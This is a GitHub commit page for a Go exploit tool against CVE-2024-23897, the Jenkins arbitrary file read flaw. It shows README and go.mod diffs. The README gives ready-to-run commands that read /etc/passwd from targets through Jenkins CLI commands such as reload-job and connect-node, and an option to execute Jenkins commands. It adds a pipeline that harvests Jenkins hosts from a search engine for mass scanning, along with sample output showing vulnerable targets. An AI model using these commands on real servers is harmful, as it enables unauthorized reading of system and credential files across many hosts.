🎉 CVE-2024-23897 v1.0.1

wjlin0 · Jan 28, 2024 · 21f7548 · 21f7548
1 parent c2bde9a
commit 21f7548
Show file tree

Hide file tree

Showing 19 changed files with 1,519 additions and 153 deletions.
diff --git a/README.md b/README.md
@@ -17,15 +17,15 @@ go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
 ```
 或者
 安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
-- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_macOS_arm64.zip)
+- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_macOS_arm64.zip)
 
-- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_macOS_amd64.zip)
+- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_macOS_amd64.zip)
 
-- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_linux_amd64.zip)
+- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip)
 
-- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_windows_amd64.zip)
+- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip)
 
-- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_windows_386.zip)
+- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_386.zip)
 
 
 # 使用
@@ -40,9 +40,14 @@ Usage:
 
 Flags:
 INPUT:
-   -url, -u string[]       URL to scan. (e.g. -u https://example.com)
-   -list string[]          File containing list of URLs to scan. (e.g. -list list.txt)
-   -f, -filename string[]  The file path that needs to be read. (e.g. -f /etc/passwd)
+   -url, -u string[]  URL to scan. (e.g. -u https://example.com)
+   -list string[]     File containing list of URLs to scan. (e.g. -list list.txt)
+
+CONFIG:
+   -c, -command string[]           JinKens Command to run. (e.g. -c 'who-am-i')
+   -a, -args string[]              The file path that needs to be read. (e.g. -f /etc/passwd)
+   -e, -exec                       JinKens Execute command.
+   -lac, -list-available-commands  List available commands.
 
 OUTPUT:
    -no-color  Don't Use colors in output
@@ -51,31 +56,46 @@ DEBUG:
    -debug                           Enable debugging
    -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
    -irt, -input-read-timeout value  timeout on input read (default 3m0s)
+   -version                         show version of CVE-2024-23897 tool
    -no-stdin                        disable stdin processing
 
 LIMIT:
    -timeout int          time to wait in seconds before timeout (default 10)
-   -t, -thread int       Number of concurrent threads (default 10)
+   -t, -thread int       Number of concurrent threads (default 30)
    -rl, -rate-limit int  Rate limit for enumeration speed (n req/sec) (default -1)
 
+UPDATE:
+   -update                      Update tool
+   -duc, -disable-update-check  Disable update check
+
 
 Examples:
-Run CVE-2024-23897 on a single targets
+Run CVE-2024-23897 check vulnerability on a single targets
         $ CVE-2024-23897 -url https://example.com
-Run CVE-2024-23897 on a list of targets
+
+Run CVE-2024-23897 check vulnerability on list of targets
         $ CVE-2024-23897 -list list.txt
-Run CVE-2024-23897 on a single targets with filenames
-        $ CVE-2024-23897 -url https://example.com -f /etc/passwd -f /etc/hostname
-Run CVE-2024-23897 on a single targets a proxy server
+
+Run CVE-2024-23897 read full file contents on a single targets
+        $ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd
+
+Run CVE-2024-23897 read available commands on a single targets
+        $ CVE-2024-23897 -url https://example.com -lac
+
+Run CVE-2024-23897 execute the JenKings command
+        $ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec
+
+Run CVE-2024-23897 check vulnerability on a single targets by proxy server
         $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890
-Run CVE-2024-23897 on uncovering Jenkins
+
+Run CVE-2024-23897 on uncovering Jenkins check vulnerability
         $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
 ```
 
 use pathScan to collect targets and pass them to CVE-2024-23897 via standard input
 
 ```shell
-pathScan -ue quake -uq 'app:"springboot"' -uc -silent -ul 200 | CVE-2024-23897
+pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
 ```
 > To protect your privacy, I have deleted some outputs
 ```text
@@ -95,11 +115,26 @@ Jenkins 任意文件读取漏洞
 开发者不承担任何责任，也不对任何误用或损坏负责.
 
 [INF] Loaded 50 targets from input
-[INF] Read /etc/passwd file first line
-[CVE-2024-23897] https://example.com /etc/hostname - cc0c73d0f754
-[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
-[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
-[CVE-2024-23897] https://example.com /etc/hostname - debian
-[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[CVE-2024-23897] https://example.com
+Mode: Check Mode
+The target is Vulnerable.
+please use command and to read file first content.
+$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd
+
+[CVE-2024-23897] https://example.com
+Mode: Check Mode
+The target is Vulnerable && This cab read full file contents
+please use command and to read full body 
+$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
+......
+......
+......
+......
+......
 [INF] took 92.75 seconds with 13 successful requests
 ```
+
+# 漏洞分析
+> If you want to learn more about the vulnerability details, you can check out phith0n analysis of this vulnerability.
+
+- [Jenkins 任意文件读取漏洞分析](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html)
diff --git a/go.mod b/go.mod
@@ -14,30 +14,48 @@ require (
 )
 
 require (
+	aead.dev/minisign v0.2.0 // indirect
+	github.com/Masterminds/semver/v3 v3.2.1 // indirect
 	github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809 // indirect
+	github.com/VividCortex/ewma v1.2.0 // indirect
 	github.com/akrylysov/pogreb v0.10.1 // indirect
+	github.com/alecthomas/chroma v0.10.0 // indirect
 	github.com/andybalholm/brotli v1.0.6 // indirect
 	github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect
+	github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
 	github.com/aymerick/douceur v0.2.0 // indirect
+	github.com/charmbracelet/glamour v0.6.0 // indirect
+	github.com/cheggaaa/pb/v3 v3.1.4 // indirect
 	github.com/cloudflare/circl v1.3.7 // indirect
 	github.com/cnf/structhash v0.0.0-20201127153200-e1b16c1ebc08 // indirect
+	github.com/denisbrodbeck/machineid v1.0.1 // indirect
 	github.com/dimchansky/utfbom v1.1.1 // indirect
+	github.com/dlclark/regexp2 v1.8.1 // indirect
 	github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect
 	github.com/gaukas/godicttls v0.0.4 // indirect
+	github.com/golang/protobuf v1.5.3 // indirect
 	github.com/golang/snappy v0.0.4 // indirect
+	github.com/google/go-github/v30 v30.1.0 // indirect
+	github.com/google/go-querystring v1.1.0 // indirect
 	github.com/gorilla/css v1.0.0 // indirect
 	github.com/json-iterator/go v1.1.12 // indirect
 	github.com/klauspost/compress v1.16.7 // indirect
 	github.com/klauspost/pgzip v1.2.5 // indirect
 	github.com/logrusorgru/aurora v2.0.3+incompatible // indirect
+	github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
 	github.com/mattn/go-colorable v0.1.13 // indirect
 	github.com/mattn/go-isatty v0.0.19 // indirect
+	github.com/mattn/go-runewidth v0.0.14 // indirect
 	github.com/mholt/archiver/v3 v3.5.1 // indirect
 	github.com/microcosm-cc/bluemonday v1.0.25 // indirect
 	github.com/miekg/dns v1.1.56 // indirect
+	github.com/minio/selfupdate v0.6.1-0.20230907112617-f11e74f84ca7 // indirect
 	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
 	github.com/modern-go/reflect2 v1.0.2 // indirect
+	github.com/muesli/reflow v0.3.0 // indirect
+	github.com/muesli/termenv v0.15.1 // indirect
 	github.com/nwaples/rardecode v1.1.3 // indirect
+	github.com/olekukonko/tablewriter v0.0.5 // indirect
 	github.com/pierrec/lz4/v4 v4.1.2 // indirect
 	github.com/pkg/errors v0.9.1 // indirect
 	github.com/projectdiscovery/blackrock v0.0.1 // indirect
@@ -47,6 +65,7 @@ require (
 	github.com/projectdiscovery/retryabledns v1.0.48 // indirect
 	github.com/quic-go/quic-go v0.37.7 // indirect
 	github.com/refraction-networking/utls v1.5.4 // indirect
+	github.com/rivo/uniseg v0.4.4 // indirect
 	github.com/saintfish/chardet v0.0.0-20230101081208-5e3ef4b5456d // indirect
 	github.com/syndtr/goleveldb v1.0.0 // indirect
 	github.com/tidwall/btree v1.4.3 // indirect
@@ -62,6 +81,8 @@ require (
 	github.com/weppos/publicsuffix-go v0.30.1-0.20230422193905-8fecedd899db // indirect
 	github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect
 	github.com/yl2chen/cidranger v1.0.2 // indirect
+	github.com/yuin/goldmark v1.5.4 // indirect
+	github.com/yuin/goldmark-emoji v1.0.1 // indirect
 	github.com/zmap/rc2 v0.0.0-20190804163417-abaa70531248 // indirect
 	github.com/zmap/zcrypto v0.0.0-20230422215203-9a665e1e9968 // indirect
 	go.etcd.io/bbolt v1.3.7 // indirect
@@ -70,9 +91,12 @@ require (
 	golang.org/x/exp v0.0.0-20221205204356-47842c84f3db // indirect
 	golang.org/x/mod v0.12.0 // indirect
 	golang.org/x/net v0.17.0 // indirect
+	golang.org/x/oauth2 v0.11.0 // indirect
 	golang.org/x/sys v0.16.0 // indirect
 	golang.org/x/text v0.14.0 // indirect
 	golang.org/x/tools v0.13.0 // indirect
+	google.golang.org/appengine v1.6.7 // indirect
+	google.golang.org/protobuf v1.31.0 // indirect
 	gopkg.in/djherbis/times.v1 v1.3.0 // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect
 )